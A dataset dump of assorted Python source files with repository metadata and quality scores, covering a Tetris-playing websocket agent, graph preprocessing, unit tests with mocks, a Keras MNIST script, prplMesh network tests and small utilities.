max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5)
---|---|---|---|---|---|---
student.py | ricardombrodriguez/Tetris-AI-Bot | 0 | 12799051 | import asyncio
import getpass
import json
import os
import websockets
from shape import S, Z, I, O, J, T, L, Shape
from search import *
async def agent_loop(server_address="localhost:8000", agent_name="student"):
async with websockets.connect(f"ws://{server_address}/player") as websocket:
# Receive information about static game properties
await websocket.send(json.dumps({"cmd": "join", "name": agent_name}))
initial_info = json.loads(
await websocket.recv()
) # receive game update, this must be called timely or your game will get out of sync with the server
shapes_keys = shapesKeys(SHAPES,initial_info)
A = -0.510066
B = -0.184483
C = -0.35663
D = 0.760666
variables = [A,B,C,D]
        new_piece = True  # flag to know whether this is a new piece and, if so, compute the search tree
        keys = []  # this can be a list of lists: each sub-list is the key sequence for one specific piece in the lookahead
        first_piece = True  # while this is True, we must call search() and compute the keys according to the lookahead
all_keys = []
# grid = {(tup[0],tup[1]) for tup in initial_info['grid']}
# x = max(grid, key = lambda coord : coord[0])[0] + 1
# y = max(grid, key = lambda coord : coord[1])[1]
# print(x,y)
while True:
try:
state = json.loads(
await websocket.recv()
) # receive game update, this must be called timely or your game will get out of sync with the server
if keys:
await websocket.send(
json.dumps({"cmd": "key", "key": keys.pop(0)})
)
                # Piece received
if 'piece' in state:
piece = state['piece']
                    next_pieces = state['next_pieces']  # only the first piece
game_speed = state['game_speed']
else:
piece = None
                # The piece has been placed and there is no new one for now
if piece is None:
new_piece = True
                # New piece
elif new_piece:
                    # If the piece belongs to a previous piece's lookahead (it only checks whether keys exist because the keys are already popped above)
if not first_piece:
                        # if all the lookahead keys have already been sent, it is over and the next piece received will run the search
if not all_keys:
first_piece = True
else:
new_piece = False
keys = all_keys.pop(0)
                    # Find the best solution for the new piece
elif first_piece:
current_shape = findShape(piece)
next_shapes = [findShape(shape) for shape in next_pieces]
shapes = None
if game_speed <= 25:
# lookahead 3
shapes = [current_shape] + next_shapes[:]
elif game_speed > 25 and game_speed < 32:
#lookahead 2
shapes = [current_shape] + next_shapes[:-1]
elif game_speed >= 32:
#lookahead 1
shapes = [current_shape] + next_shapes[:-2]
#shapes = [current_shape] + next_shapes[:-2]
s = Search(state,initial_info,shapes,variables,shapes_keys)
s.search()
all_keys = None
try:
all_keys = [sol.keys for sol in s.best_solution.solutions]
except:
all_keys = [["s"]]*len(shapes)
keys = all_keys.pop(0)
new_piece = False
first_piece = False
except websockets.exceptions.ConnectionClosedOK:
print("Server has cleanly disconnected us")
return
def shapesKeys(shapes, initial_info):
grid = {(tup[0],tup[1]) for tup in initial_info['grid']}
x = max(grid, key = lambda coord : coord[0])[0] + 1
    shapekeys = dict()  # dictionary that stores shape+rotation and all possible key sequences on the board for that piece at that rotation
    for fshape in shapes:  # for every existing shape, find ALL the key combinations that can be pressed
fshape.set_pos((x - fshape.dimensions.x) / 2, 0)
        for rot in range(0, len(fshape.plan)):  # loop over every rotation of the current piece
_fs = copy(fshape)
_fs.rotate(rot)
min_x = min(_fs.positions, key=lambda coords: coords[0])[0]
max_x = max(_fs.positions, key=lambda coords: coords[0])[0]
name = _fs.name + str(rot)
            # iterate over columns [1, 8]
for a in range(1, x-1):
x_differential = a - min_x
                # discard invalid solutions
if (x_differential + max_x >= x - 1):
break
keys = ["w"]*rot
keys += ["a"]*abs(x_differential) + ["s"] if x_differential < 0 else ["d"]*abs(x_differential) + ["s"]
shapekeys.setdefault(name, []).append(keys)
return shapekeys
def findShape(piece):
#S (done)
if piece[0][0] == piece[1][0] and piece[1][1] == piece[2][1] and piece[2][0] == piece[3][0]:
fshape = Shape(S)
#Z (done)
elif piece[0][0] == piece[2][0] and piece[1][1] == piece[2][1] and piece[1][0] == piece[3][0]:
fshape = Shape(Z)
#I (done)
elif piece[0][1] == piece[1][1] and piece[1][1] == piece[2][1] and piece[2][1] == piece[3][1]:
fshape = Shape(I)
#O (done)
elif piece[0][0] == piece[2][0] and piece[0][1] == piece[1][1] and piece[1][0] == piece[3][0] and piece[2][1] == piece[3][1]:
fshape = Shape(O)
#J (done)
elif piece[0][1] == piece[1][1] and piece[0][0] == piece[2][0] and piece[2][0] == piece[3][0]:
fshape = Shape(J)
#T (done)
elif piece[0][0] == piece[1][0] and piece[1][1] == piece[2][1] and piece[1][0] == piece[3][0]:
fshape = Shape(T)
#L (done)
elif piece[0][0] == piece[1][0] and piece[1][0] == piece[2][0] and piece[2][1] == piece[3][1]:
fshape = Shape(L)
return fshape
# DO NOT CHANGE THE LINES BELOW
# You can change the default values using the command line, example:
# $ NAME='arrumador' python3 client.py
loop = asyncio.get_event_loop()
SERVER = os.environ.get("SERVER", "localhost")
PORT = os.environ.get("PORT", "8000")
NAME = os.environ.get("NAME", getpass.getuser())
loop.run_until_complete(agent_loop(f"{SERVER}:{PORT}", NAME)) | 2.890625 | 3 |
python/trans_graph.py | Juelin-Liu/GraphSetIntersection | 12 | 12799052 | import sys
import time
def gen_continuous_id_graph(inputFile, outputFile, isUndirected=False):
with open(inputFile, 'r') as fin, open(outputFile, 'w') as fout:
cur_idx = 0
idmap = {}
for line in fin:
if line.startswith('#') or line.startswith('%'):
continue
org_u,org_v = line.split()
if org_u not in idmap:
idmap[org_u] = cur_idx
cur_idx += 1
if org_v not in idmap:
idmap[org_v] = cur_idx
cur_idx += 1
u = idmap[org_u]
v = idmap[org_v]
fout.write(str(u) + '\t' + str(v) + '\n')
if isUndirected:
fout.write(str(v) + '\t' + str(u) + '\n')
    print('cur_idx=', cur_idx)
def gen_orgorder_graph(inputFile, outputFile, isUndirected=False):
edges = []
org_id_map = {}
org_id_list = []
with open(inputFile, 'r') as fin:
for line in fin:
if line.startswith('#') or line.startswith('%'):
continue
org_u,org_v = line.split()
u = int(org_u)
v = int(org_v)
if (u not in org_id_map):
org_id_map[u] = u
org_id_list.append(u)
if (v not in org_id_map):
org_id_map[v] = v
org_id_list.append(v)
edges.append((u, v))
org_id_list.sort()
    for i in range(len(org_id_list)):
org_id_map[org_id_list[i]] = i
    for i in range(len(edges)):
u,v = org_id_map[edges[i][0]],org_id_map[edges[i][1]]
edges[i] = (u,v)
# edges.sort()
with open(outputFile, 'w') as fout:
for u,v in edges:
fout.write(str(u) + ' ' + str(v) + '\n')
if isUndirected:
fout.write(str(v) + ' ' + str(u) + '\n')
if __name__ == "__main__":
# get_types(sys.argv[1], sys.argv[2])
isUndirected = False
if (len(sys.argv) > 3 and sys.argv[3] == '-u'):
isUndirected = True
time_start = time.time()
gen_continuous_id_graph(sys.argv[1], sys.argv[2], isUndirected)
# gen_orgorder_graph(sys.argv[1], sys.argv[2], isUndirected)
time_end = time.time()
    time_cost = (time_end - time_start) * 1000.0  # convert seconds to milliseconds
    print('time_cost = %.3fms' % time_cost) | 2.625 | 3 |
blaze/tests/test_toplevel.py | davidfischer/blaze-core | 1 | 12799053 | import os.path
from blaze.test_utils import temp_dir
import blaze.toplevel as toplevel
from blaze.params import params
from blaze import dshape
from blaze.sources.chunked import CArraySource, CTableSource
from blaze.eclass import eclass
def test_open_carray():
with temp_dir() as temp:
# Create an array on disk
array_filename = os.path.join(temp, 'carray')
p = params(storage=array_filename)
ds = dshape('1,int32')
a = CArraySource([2], dshape=ds, params=p)
del a
# Open array with open function
uri = 'carray://' + array_filename
c = toplevel.open(uri)
assert c.datashape == ds
# Test delayed mode
c = toplevel.open(uri, eclass=eclass.delayed)
assert c.datashape == ds
def test_open_ctable():
with temp_dir() as temp:
        # Create a table on disk
table_filename = os.path.join(temp, 'ctable')
p = params(storage=table_filename)
ds = dshape('1,{ x: int32; y: int32 }')
t = CTableSource(data=[(1, 1), (2, 2)], dshape=ds, params=p)
del t
# Open table with open function
uri = 'ctable://' + table_filename
c = toplevel.open(uri)
assert c.datashape == ds
# Test delayed mode
c = toplevel.open(uri, eclass=eclass.delayed)
assert c.datashape == ds
| 2.09375 | 2 |
xframes/cmp_rows.py | cchayden/xframes | 0 | 12799054 | <filename>xframes/cmp_rows.py
# Row comparison wrapper for ascending or descending comparison.
class CmpRows(object):
""" Comparison wrapper for a row.
Rows can be sorted on one or more columns, and each one
may be ascending or descending.
This class wraps the row, remembers the column indexes used for
    comparing the rows, and each one's ascending/descending flag.
It provides the needed comparison functions for sorting.
Rows are assumed to be indexable collections of values.
Values may be any python type that itself is comparable.
The underlying python comparison functions are used on these values.
"""
def __init__(self, row, indexes, ascending):
""" Instantiate a wrapped row. """
self.row = row
self.indexes = indexes
self.ascending = ascending
def less(self, other):
""" True if self is less than other.
Comparison is reversed when a row is marked descending.
"""
for index, ascending in zip(self.indexes, self.ascending):
left = self.row[index]
right = other.row[index]
if left < right: return ascending
if left > right: return not ascending
return False
def greater(self, other):
""" True if self is greater than other.
Comparison is reversed when a row is marked descending.
"""
for index, ascending in zip(self.indexes, self.ascending):
left = self.row[index]
right = other.row[index]
if left > right: return ascending
if left < right: return not ascending
return False
def equal(self, other):
""" True when self is equal to other.
Only comparison fields are used in this test.
"""
for index in self.indexes:
left = self.row[index]
right = other.row[index]
if left > right: return False
if left < right: return False
return True
    # These methods provide the comparison interface
def __lt__(self, other):
return self.less(other)
def __gt__(self, other):
return self.greater(other)
def __eq__(self, other):
return self.equal(other)
def __le__(self, other):
return self.less(other) or self.equal(other)
def __ge__(self, other):
return self.greater(other) or self.equal(other)
def __ne__(self, other):
return not self.equal(other)
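# A minimal usage sketch (added for illustration; not part of the original module).
# Rows are assumed to be plain tuples here; sort by column 0 ascending, then column 2
# descending, by wrapping each row in CmpRows and letting sorted() use its __lt__.
if __name__ == '__main__':
    rows = [(1, 'a', 10), (1, 'b', 20), (0, 'c', 5)]
    ordered = sorted(rows, key=lambda r: CmpRows(r, [0, 2], [True, False]))
    print(ordered)  # [(0, 'c', 5), (1, 'b', 20), (1, 'a', 10)]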
| 3.453125 | 3 |
projects/baby_driver/scripts/test_can_send.py | Citrusboa/firmware_xiv | 14 | 12799055 | <filename>projects/baby_driver/scripts/test_can_send.py
"""This Module Tests methods in can_send.py"""
# pylint: disable=unused-import
import unittest
from unittest.mock import patch, Mock
import can
import cantools
import can_util
from message_defs import BABYDRIVER_DEVICE_ID
from can_send import can_send_raw, load_dbc, can_send
class TestCanSendRaw(unittest.TestCase):
"""Tests functions in Babydriver's can_send module"""
@patch('can_util.send_message')
def test_can_send_raw_parameters(self, mock_send_message):
"""Tests accuracy of parameters passed into can_send_raw"""
# Stores parameters passed into can_util.send_message
# pylint: disable=attribute-defined-outside-init
self.msg_id = None
self.data = None
self.device_id = None
self.channel = None
# pylint: disable=missing-docstring
def parameter_test(msg_id, data, device_id=BABYDRIVER_DEVICE_ID, channel=None):
self.msg_id = msg_id
self.data = data
self.device_id = device_id
self.channel = channel
# Checks whether parameters passed into can_send_raw match
# parameters passed into parameter_test
mock_send_message.side_effect = parameter_test
can_send_raw(0, [10, 255, 0], BABYDRIVER_DEVICE_ID, None)
self.assertEqual(0, self.msg_id)
self.assertEqual([10, 255, 0], self.data)
self.assertEqual(BABYDRIVER_DEVICE_ID, self.device_id)
self.assertEqual(None, self.channel)
@patch('can_util.send_message')
def test_can_send_raw_fail(self, mock_send_message):
"""Tests that can_send_raw raises an Exception if CAN msg fails to send"""
mock_send_message.side_effect = can.CanError
mock_msg_id = 0
mock_data = [0, 0, 255]
self.assertRaises(Exception, can_send_raw, mock_msg_id, mock_data)
@patch('cantools.database.load_file')
def test_load_dbc_fail(self, mock_cantools_load_file):
"""Tests that load_dbc raises an Exception if no file is found"""
mock_cantools_load_file.side_effect = can.CanError
self.assertRaises(Exception, load_dbc, "./some-file-path")
@patch('cantools.database.load_file')
@patch('can_util.get_bus')
    def test_can_send_parameters(self, mock_get_bus, mock_load_file):
        """Tests accuracy of parameters passed into can_send"""
# pylint: disable=attribute-defined-outside-init
self.arbitration_id = None
self.data = None
# pylint: disable=missing-docstring
def parameter_test(can_msg):
self.arbitration_id = can_msg.arbitration_id
self.data = can_msg.data
# Creates mock object with frame_id attribute and encode function
msg_obj = Mock()
msg_obj.frame_id = 1
msg_obj.encode.return_value = [1, 2]
# Calling bus.send() triggers parameter test
can_msg = Mock()
can_msg.send.return_value = 3
can_msg.send.side_effect = parameter_test
database = Mock()
database.get_message_by_name.return_value = msg_obj
mock_load_file.return_value = database
mock_get_bus.return_value = can_msg
# dbc_database must be initialized before using can_send
load_dbc("./some_file_path")
can_send("some message", "vcan0", time=20)
self.assertEqual(1, self.arbitration_id)
self.assertEqual(bytearray(b'\x01\x02'), self.data)
@patch('cantools.database.load_file')
def test_can_send_fail(self, mock_load_file):
"""Tests that can_send raises an Exception if msg_obj data cannot be encoded"""
msg_obj = Mock()
msg_obj.frame_id = 1
# An error is raised when msg_obj data is encoded
msg_obj.encode.side_effect = can.CanError
database = Mock()
database.get_message_by_name.return_value = msg_obj
mock_load_file.return_value = database
# dbc_database must be initialized before using can_send
load_dbc("./some_file_path")
self.assertRaises(Exception, can_send, "some message")
if __name__ == '__main__':
unittest.main()
| 2.375 | 2 |
cmkinitramfs/utils.py | lleseur/cmkinitramfs | 0 | 12799056 | """Module providing miscellaneous utilities used by cmkinitramfs"""
from __future__ import annotations
import functools
import hashlib
import os.path
# Function needed for python < 3.9
def removeprefix(string: str, prefix: str) -> str:
"""Remove a prefix from a string
Add support for :meth:`str.removeprefix` for Python < 3.9.
:param string: String to remove prefix from
:param prefix: Prefix to remove
"""
# return string.removeprefix(prefix)
if string.startswith(prefix):
return string[len(prefix):]
return string
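# Example behaviour (added illustration, not in the original module):
#   removeprefix('/usr/lib/modules', '/usr')  ->  '/lib/modules'
#   removeprefix('vmlinuz', '/usr')           ->  'vmlinuz'  (prefix absent, unchanged)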
def normpath(path: str) -> str:
"""Normalize path (actually eliminates double slashes)
:param path: Path to normalize
"""
return os.path.normpath(path).replace('//', '/')
@functools.lru_cache()
def hash_file(filepath: str, chunk_size: int = 65536) -> bytes:
"""Calculate the SHA512 of a file
:param filepath: Path of the file to hash
:param chunk_size: Number of bytes per chunk of file to hash
:return: File hash in a :class:`bytes` object
"""
sha512 = hashlib.sha512()
with open(filepath, 'rb') as src:
for chunk in iter(lambda: src.read(chunk_size), b''):
sha512.update(chunk)
return sha512.digest()
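# Small usage sketch (added; not part of the original module): hashing this file itself.
# hash_file() returns raw bytes, so .hex() gives the familiar hexadecimal digest string.
if __name__ == '__main__':
    print(hash_file(__file__).hex())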
| 3.21875 | 3 |
constructer/major-tsv/getMajor_obj_TH_EN.py | marsDev31/KUnit | 1 | 12799057 | f = open("stdList.tsv").readlines()
obj = ""
data = []
for txtLine in f:
data = txtLine.split('\t')
obj += "{value:'" + data[0] + "', label:'"+ data[0] + " " + data[2] + " (" + data[1] + " " + data[3].replace('\n','') + ")'}," + "\n"
print(obj)
obj = str('['+ obj +']').replace(',]',']')
save = open("mahor_th_en.js", "w")
save.write(obj)
| 2.625 | 3 |
python_gui_tkinter/KALU/GARBAGE1/label_ckbtn.py | SayanGhoshBDA/code-backup | 16 | 12799058 | <reponame>SayanGhoshBDA/code-backup
from tkinter import StringVar, Tk, Label, Checkbutton, IntVar
def update_label():
if var.get() == 1:
label_text.set("On")
else:
label_text.set("Off")
window = Tk()
label_text = StringVar()
label = Label(window, textvariable=label_text)
label_text.set("Off")
var = IntVar()
check= Checkbutton(window, text="On", variable=var,
onvalue=1, offvalue=0, command=update_label)
label.pack()
check.pack(side="left")
window.mainloop()
| 3.15625 | 3 |
travellifestyleblog22/migrations/0009_remove_category_image.py | biareiam/travellifestyleblog | 0 | 12799059 | # Generated by Django 3.2 on 2022-04-08 15:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('travellifestyleblog22', '0008_alter_category_image'),
]
operations = [
migrations.RemoveField(
model_name='category',
name='image',
),
]
| 1.351563 | 1 |
Tensorflow/other/mnist_test.py | egesko/SideChannel-AdversarialAI | 4 | 12799060 | import os
os.environ['TF_CPP_MIN_LOG_LEVEL']= '2'
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.datasets import mnist
physical_devices = tf.config.list_physical_devices('GPU')
print(physical_devices)
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(-1, 28*28).astype("float32") / 255.0
x_test = x_test.reshape(-1, 28*28).astype("float32") / 255.0
#Sequential API
model = keras.Sequential(
[
layers.Dense(512,activation='relu'),
layers.Dense(216, activation = 'relu'),
layers.Dense(10)
]
)
model.compile(
loss= keras.losses.SparseCategoricalCrossentropy(from_logits=True),
optimizer=keras.optimizers.Adam(lr=0.001),
metrics=["accuracy"],
)
model.fit(x_train,y_train,batch_size=32,epochs=5,verbose=2)
model.evaluate(x_test, y_test, batch_size= 32, verbose=2)
| 2.546875 | 3 |
payments/urls.py | HimanshuAwasthi95/pune.pycon.org | 0 | 12799061 | from django.conf.urls import url
import payments.views
urlpatterns = [
url(r"^webhook/$", payments.views.webhook,
name="webhook"),
]
| 1.359375 | 1 |
tests/boardfarm_plugins/boardfarm_prplmesh/tests/beacon_report_query_and_response.py | SWRT-dev/easymesh | 0 | 12799062 | ###############################################################
# SPDX-License-Identifier: BSD-2-Clause-Patent
# SPDX-FileCopyrightText: 2020 the prplMesh contributors (see AUTHORS.md)
# This code is subject to the terms of the BSD+Patent license.
# See LICENSE file for more details.
###############################################################
from .prplmesh_base_test import PrplMeshBaseTest
from boardfarm.exceptions import SkipTest
from capi import tlv
from opts import debug
import time
class BeaconReportQueryAndResponse(PrplMeshBaseTest):
''' This test verifies that a MAUT with an associated STA responds
to a Beacon Metrics Query by sending a Beacon Report request to its associated STA,
receiving a response from the STA, and sending the contents of that response
in a Beacon Metrics Response message to the Controller '''
def runTest(self):
# Locate test participants
try:
sta = self.dev.wifi
agent = self.dev.DUT.agent_entity
controller = self.dev.lan.controller_entity
except AttributeError as ae:
raise SkipTest(ae)
sniffer = self.dev.DUT.wired_sniffer
sniffer.start(self.__class__.__name__ + "-" + self.dev.DUT.name)
# Step 3. MAUT sends Association Response frame to STA
sta.wifi_connect_check(agent.radios[0].vaps[0])
time.sleep(1)
debug("Send Associated STA Link Metrics Query message")
mid = controller.ucc_socket.dev_send_1905(
agent.mac, self.ieee1905['eMessageType']['ASSOCIATED_STA_LINK_METRICS_QUERY_MESSAGE'],
tlv(self.ieee1905['eTlvTypeMap']['TLV_STAMAC_ADDRESS_TYPE'], sta.mac))
time.sleep(5)
debug("STA sends a valid Association Request frame to MAUT")
self.check_log(agent,
"Send AssociatedStaLinkMetrics to controller, mid = {}".format(mid),
timeout=20)
self.check_cmdu_type_single("Associated STA Link Metrics Response", 0x800E,
agent.mac, controller.mac, mid)
# Step 4. Send Beacon Metrics Query to agent.
agent.radios[0].send_bwl_event(
"DATA RRM-BEACON-REP-RECEIVED {} channel=1 dialog_token=0 measurement_rep_mode=0 \
            op_class=0 duration=50 rcpi=-80 rsni=10 bssid=aa:bb:cc:11:00:10".format(sta.mac))
'''- Operating Class field equal to 115
- Channel Number field equal to 255
- BSSID field equal to wildcard (0xFFFFFFFFFFFF)
- Reporting Detail equal to 2
- SSID length field equal to 0 (SSID field missing)
- Number of AP Channel Reports equal to 1
- Length of AP Channel Report equal to 0x03
- Operating Class in AP Channel Report equal to 115
- Channel List in AP Channel Report equal to 36 and 48 '''
beacon_query_tlv_val = "{sta_mac} ".format(sta_mac=sta.mac)
beacon_query_tlv_val += "{0x73 0xFF 0xFFFFFFFFFFFF 0x02 0x00 0x01 0x03 0x73 0x24 0x30}"
debug("Send Beacon Metrics Query from controller to agent.")
mid = controller.ucc_socket.dev_send_1905(
agent.mac, self.ieee1905['eMessageType']['BEACON_METRICS_QUERY_MESSAGE'],
tlv(self.ieee1905['eTlvTypeMap']['TLV_BEACON_METRICS_QUERY'],
beacon_query_tlv_val))
# Step 5. Verify that MAUT sends a 1905 ACK to Controller.
time.sleep(1)
self.check_cmdu_type_single(
"ACK", self.ieee1905['eMessageType']['ACK_MESSAGE'], agent.mac, controller.mac, mid)
debug("Confirming ACK message was received.")
# Step 6. Verify that MAUT sends a correct Beacon request to STA.
time.sleep(1)
self.check_log(agent.radios[0], r"BEACON_METRICS_QUERY")
debug("Confirming that MAUT sends a Beacon request to STA.")
# Step 7. STA responds with Beacon report
time.sleep(1)
self.check_log(controller, r"got beacon response from STA. mid:", timeout=10)
# Step 8. MAUT sends Beacon Metrics Response to Controller
beacon_resp = self.check_cmdu_type_single(
"Agent send Beacon Response to controller.",
self.ieee1905['eMessageType']['BEACON_METRICS_RESPONSE_MESSAGE'],
agent.mac, controller.mac)
debug("Confirming MAUT sends Beacon Metrics Response to Controller.")
beacon_resp_tlv = self.check_cmdu_has_tlv_single(beacon_resp, 154)
''' Don't check Beacon Metrics measurement report, as it's always empty
https://jira.prplfoundation.org/browse/PPM-52 '''
assert beacon_resp_tlv.beacon_metrics_mac_addr == sta.mac, \
"Wrong beacon metrics mac addr in Beacon Respond"
sta.wifi_disconnect(agent.radios[0].vaps[0])
| 2.265625 | 2 |
tests/Monkeypatching/test_Api_monkeypatching_api_delete.py | LudwikaMalinowska/Automated-Testing-Project2 | 0 | 12799063 | import unittest
import requests
from assertpy import assert_that
from requests.exceptions import Timeout
from unittest.mock import Mock, patch
from src.Api import Api
from src.todos import todos
class TestApiMonkeyPatch(unittest.TestCase):
@patch('src.Api.Api', autospec=True)
def test_method_api_delete_raises_timeout(self, mock_class):
mock_id = Mock()
mock_id.return_value = 1
mock_class.api_delete.side_effect = Timeout
with self.assertRaises(Timeout):
mock_class.api_delete(mock_id)
def test_method_api_delete_assert_that_called_once(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete(mock_id)
mock_api.api_delete.assert_called_once()
def test_method_api_delete_assert_that_called(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_delete(mock_id)
mock_api.api_delete(mock_id2)
mock_api.api_delete.assert_called()
def test_method_api_delete_assert_that_not_called(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete.assert_not_called()
def test_method_api_delete_assert_that_called_with_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete(mock_id)
mock_api.api_delete.assert_called_with(mock_id)
def test_method_api_delete_assert_that_called_once_with_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete(mock_id)
mock_api.api_delete.assert_called_once_with(mock_id)
def test_method_api_delete_assert_that_response_has_status_code_200(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response).has_status_code(200)
def test_method_api_delete_assert_that_response_status_code_is_not_200(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"status_code": 408}
response = mock_api.api_delete(todo_id)
assert_that(response["status_code"]).is_not_equal_to(200)
def test_method_api_delete_assert_that_response_is_instance_of_dict(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response).is_instance_of(dict)
def test_method_api_delete_assert_that_response_has_key_delete_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response).has_delete_id(1)
def test_method_api_delete_assert_that_response_returns_deleted_data(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response["deleted_data"]).is_equal_to(todos[0])
def test_method_api_delete_assert_that_response_deleted_data_contain_all_keys_userId_id_title_completed(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response["deleted_data"]).contains_key("userId", "id", "title", "completed")
def test_method_api_delete_assert_that_not_called_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete(mock_id)
with self.assertRaises(AssertionError):
mock_api.api_delete.assert_not_called()
def test_method_api_delete_assert_that_called_once_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_delete(mock_id)
mock_api.api_delete(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_delete.assert_called_once()
def test_method_api_delete_assert_that_called_with_id_1_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_delete(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_delete.assert_called_with(mock_id)
def test_method_api_delete_assert_that_called_once_with_id_1_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_delete(mock_id)
mock_api.api_delete(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_delete.assert_called_once_with(mock_id)
def test_method_api_delete_no_parameter_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
with self.assertRaises(TypeError):
mock_api.api_delete()
def test_method_api_delete_assert_that_response_returns_ValueError_when_called_with_id_0_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 0
mock_api.api_delete.return_value = {"status_code": 408}
mock_api.api_delete.side_effect = ValueError
assert_that(mock_api.api_delete).raises(ValueError).when_called_with(todo_id)
def test_method_api_delete_assert_that_response_returns_ValueError_when_called_with_id_300_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 300
mock_api.api_delete.return_value = {"status_code": 408}
mock_api.api_delete.side_effect = ValueError
assert_that(mock_api.api_delete).raises(ValueError).when_called_with(todo_id)
def test_method_api_delete_assert_that_response_returns_TypeError_when_called_with_id_not_int_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = "1"
mock_api.api_delete.return_value = {"status_code": 408}
mock_api.api_delete.side_effect = TypeError
assert_that(mock_api.api_delete).raises(TypeError).when_called_with(todo_id)
def test_method_api_delete_assert_that_response_returns_AttributeError_when_called_with_None_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = None
mock_api.api_delete.return_value = {"status_code": 408}
mock_api.api_delete.side_effect = AttributeError
assert_that(mock_api.api_delete).raises(AttributeError).when_called_with(todo_id)
if __name__ == '__main__':
unittest.main() | 2.609375 | 3 |
leetcode/valid_mountain_array.py | Nyior/algorithms-and-datastructures-python | 1 | 12799064 | """
Given an array of integers arr, return true if and only if it is a valid mountain array.
Recall that arr is a mountain array if and only if:
arr.length >= 3
There exists some i with 0 < i < arr.length - 1 such that:
arr[0] < arr[1] < ... < arr[i - 1] < arr[i]
arr[i] > arr[i + 1] > ... > arr[arr.length - 1]
"""
from typing import List
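# Illustrative cases (added; not part of the original solution):
#   validMountainArray([0, 3, 2, 1]) -> True   (strictly rises, then strictly falls)
#   validMountainArray([3, 5, 5])    -> False  (plateau at the peak)
#   validMountainArray([0, 1, 2])    -> False  (never descends)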
def validMountainArray(arr: List[int]) -> bool:
if len(arr) < 3:
return False
peak_index = 0
n = len(arr)
for i in range(n-1):
if arr[i] >= arr[i+1]:
peak_index = i
break
if peak_index == 0:
return False
for i in range(peak_index, n-1):
if arr[i] <= arr[i+1]:
return False
return True | 4.28125 | 4 |
mod_dnase_score.py | aniketk21/tfbs-prediction | 2 | 12799065 | <gh_stars>1-10
'''
mod_dnase_score.py
usage: python mod_dnase_score.py bedgraph_file.bedgraph dataset.dat output.dat
modify the DNASE score.
'''
import sys
bed = open(sys.argv[1])
inp = open(sys.argv[2])
out = open(sys.argv[3], 'w')
inpl = inp.readlines()
bedl = bed.readlines()
for i in range(len(bedl)):
    bedl[i] = bedl[i].split()
for i in range(len(inpl)):
inpl[i] = inpl[i].split()
print('Length of ' + sys.argv[1] + ': ' + str(len(bedl)))
print('Length of ' + sys.argv[2] + ': ' + str(len(inpl)))
cnt = 0
i = 0
line = ''
for el in bedl:
low = int(el[1])
high = int(el[2])
dnase = el[3]
while True:
elem = inpl[i]
if int(elem[1]) <= high:
line += str(elem[0]) + '\t' + str(elem[1]) + '\t' + str(elem[2]) + '\t' + str(elem[3]) + '\t' + str(elem[4]) + '\t' + str(dnase) + '\t' + str(elem[6]) + '\n'
i += 1
if i == len(inpl):
break
else:
break
if i == len(inpl):
break
cnt += 1
for j in range(i, len(inpl)):
elem = inpl[j]
line += str(elem[0]) + '\t' + str(elem[1]) + '\t' + str(elem[2]) + '\t' + str(elem[3]) + '\t' + str(elem[4]) + '\t' + '0' + '\t' + str(elem[6]) + '\n'
out.write(line)
print('Length of ' + sys.argv[3] + ': ' + str(line.count('\n')))
inp.close()
bed.close()
out.close()
| 2.75 | 3 |
src/craftr/core/impl/actions/LambdaAction.py | craftr-build/craftr-core | 64 | 12799066 |
import dataclasses
import typing as t
from craftr.core.base import Action, ActionContext
